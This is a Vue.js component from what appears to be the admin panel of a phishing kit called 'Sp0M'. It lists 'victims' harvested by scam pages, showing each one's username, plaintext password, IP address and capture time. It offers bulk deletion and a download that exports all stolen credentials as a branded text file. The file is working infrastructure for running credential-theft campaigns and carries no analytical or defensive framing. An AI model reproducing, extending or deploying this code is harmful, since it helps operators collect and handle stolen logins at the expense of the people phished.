<template>
	<div>
		<v-data-table
		v-model="selected"
		:headers="headers"
		:items="AllVictims"
		item-key="idFront"
		:page.sync="page"
		:items-per-page="itemsPerPage"
		hide-default-footer
        show-select
        :loading="isTableLoading"
        loading-text="Loading victims ..."
        light
        :custom-sort="sortByDate"
		@page-count="pageCount = $event"
		>
        <v-data-table-header ></v-data-table-header>
            <!-- Customize headers with icons -->
            <template v-slot:header.scama>
                 <v-icon small>mdi-file</v-icon> {{ $t("victims.scama") }}
            </template>

            <template v-slot:header.username>
                <v-icon small>mdi-account</v-icon> {{ $t("victims.username") }}
            </template>

            <template v-slot:header.password>
                <v-icon small>mdi-lock-open</v-icon> {{ $t("victims.password") }}
            </template>

            <template v-slot:header.ip>
                <v-icon small>mdi-map-marker</v-icon> {{ $t("victims.ip") }}
            </template>

            <template v-slot:header.created_at>
                <v-icon small>mdi-clock</v-icon> {{ $t("victims.time") }}
            </template>

            <!-- Customize created_at timestamp to readable time -->
            <template v-slot:item.created_at="{ item }">
              {{ item.created_at.toLocaleString() }}
            </template>

            <!-- Buttons -->
			<template v-slot:header>
				<div style="display: table-caption;">
                    <!-- Delete Button -->
                    <div class="float-left mt-1 ml-1">
                        <v-btn @click="dialog = true" color="primary" id="deleteBtn" class="m-1 capt" :disabled="!checked()" rounded >
        					<i class="fas fa-trash-alt"></i> {{ $t("victims.deleteSelected") }}
        				</v-btn>
                    </div>
                    <!-- Download Button -->
                    <div class="float-right mt-1 mr-1">
                        <v-btn color="primary" id="downloadBtn" class="m-1 capt" :disabled="!hasVictims()"  rounded @click="downloadVictims">
                            <i class="fas fa-cloud-download-alt"></i> {{ $t("victims.download") }}
                        </v-btn>
                    </div>
                </div>
			</template>
  		</v-data-table>

        
		<div class="text-center pt-2">
            <!-- Pagination -->
			<v-pagination v-model="page" :length="pageCount"></v-pagination> 
            <!-- Items per page -->
			<v-text-field 
			:value="itemsPerPage"
			label="Items per page"
			type="number"
			min="-1"
			max="1000"
			@input="itemsPerPage = Number($event)"
			></v-text-field> 
		</div>

        <!--Alert popup on delete -->
        <v-dialog v-model="dialog" max-width="400">
          <v-card>
            <v-card-title class="completeWord headline">{{ $t("victims.sureDelete?") }}</v-card-title>
            <v-card-actions>
              <v-spacer></v-spacer>
              <v-btn @click="dialog = false; selected= []"> {{ $t("victims.disagree") }} </v-btn>
              <v-btn color="error" @click="deleteVictims(selected); dialog = false; selected= []"> {{ $t("victims.agree") }} </v-btn>
            </v-card-actions>
          </v-card>
        </v-dialog>
	</div>
</template>

<style>
.completeWord{
    word-break: break-word;
}
</style>

<script>
import Victim from "@/apis/Victim";
import axios from "axios";

import { mapGetters, mapActions } from 'vuex'

export default {
	name: 'victimTable',
	data () {
      return {
        dialog: false,
        selected: [],
        page: 1,
        pageCount: 0,
        itemsPerPage: 10,
        //sortable: false => to hide Sort By in mobile
        headers: [
          { text: this.$t('victims.scama'), value: 'scama', width: '14%', sortable: false },
          { text: this.$t('victims.username'), value: 'username', width: '26%', sortable: false },
          { text: this.$t('victims.password'), value: 'password', width: '26%', sortable: false },
          { text: this.$t('victims.ip'), value: 'ip', width: '16%', sortable: false},
          { text: this.$t('victims.time') , value: 'created_at', width: '18%' , sortable: false},
        ]
      }
    },

    computed: {
        ...mapGetters({
          user: 'auth/user',
          AllVictims : 'victims/getAllVictims',
          isTableLoading : 'victims/isTableLoading',
          isFetched : 'victims/isFetched',
        }),
    },
    methods:{

        //Vuex Actions
        ...mapActions({
          fetchVictims: 'victims/fetchVictims',
          deleteVictims: 'victims/deleteVictims',
        }),

    	/**
    	 * Check if at least 1 elment is selected
    	 * @return {boolean} true if selected, else false
    	 */
    	checked(){
            if(this.selected === undefined)
                return false;
            else 
                return this.selected.length > 0;
    	},

        /**
         * Check if user has victims
         * @return {Boolean} true if has victims, else false
         */
        hasVictims(){
            if(this.AllVictims === undefined)
                return false;
            else 
                return this.AllVictims.length > 0;
        },

        /**
         * Count how many victims user has
         * @return {int} Total victims
         */
        countVictims(){
            return this.AllVictims.length;
        },

        /**
         * Count how many victims user in last 224h
         * @return {int} Today victims
         */
        countLastVictims(){
            return this.AllVictims.filter((v) => {
                        return v.created_at >= new Date(new Date().setDate(new Date().getDate()-1));
                    }).length;
        },

        /**
        * @return the date of today
        */
        getDateToday(){
            var dateObj = new Date();
            var month = dateObj.getUTCMonth() + 1; //months from 1-12
            var day = dateObj.getUTCDate();
            var year = dateObj.getUTCFullYear();

            return year + "/" + month + "/" + day;
        },

        /**
         * Download all victim list
         */
        downloadVictims(){

            //Victims Data
            var victimsData = "";
            this.AllVictims.forEach(function (value, index){
                victimsData += ".: Sp0M :._____________________________" + ++index +"/\n";
                victimsData += "|Type      : " + value.scama                        +"\n";
                victimsData += "|Login     : " + value.username                     +"\n";
                victimsData += "|Password  : " + value.password                     +"\n";
                victimsData += "|IP        : " + value.ip                           +"\n";
                victimsData += "|TIME      : " + value.created_at.toLocaleString()  +"\n";
                victimsData += "_______________________________________\n\n";
            });

            //Squelette
            var content = "Time : " + new Date().toLocaleString() + "\n \n";
                content += "You have " + this.countVictims() +" victims !!" + "\n";
                content += "_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n\n";
                content += victimsData + "\n";
                content += "_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n\n";
                content += "Contact : admin@sp0m.com\n";
                content += "Copyright © 2020 Sp0M.";

            this.downloadFile("Sp0m Victims ("+this.getDateToday()+").txt",content);
        },

        /**
         * Help function for download
         */
        downloadFile(filename, text) {
            var element = document.createElement('a');
            element.setAttribute('href', 'data:text/plain;charset=utf-8,' + encodeURIComponent(text));
            element.setAttribute('download', filename);
            element.style.display = 'none';
            document.body.appendChild(element);
            element.click();
            document.body.removeChild(element);
        },

        /**
        * Sort Victims by Date (created_at)
        */
        sortByDate(victims){
            victims.sort(function (a, b) {
              return b.created_at - a.created_at;
            });
            return victims;
        },
    },
	mounted(){
        if(!this.isFetched){
            this.fetchVictims();
        }
	}
};
</script>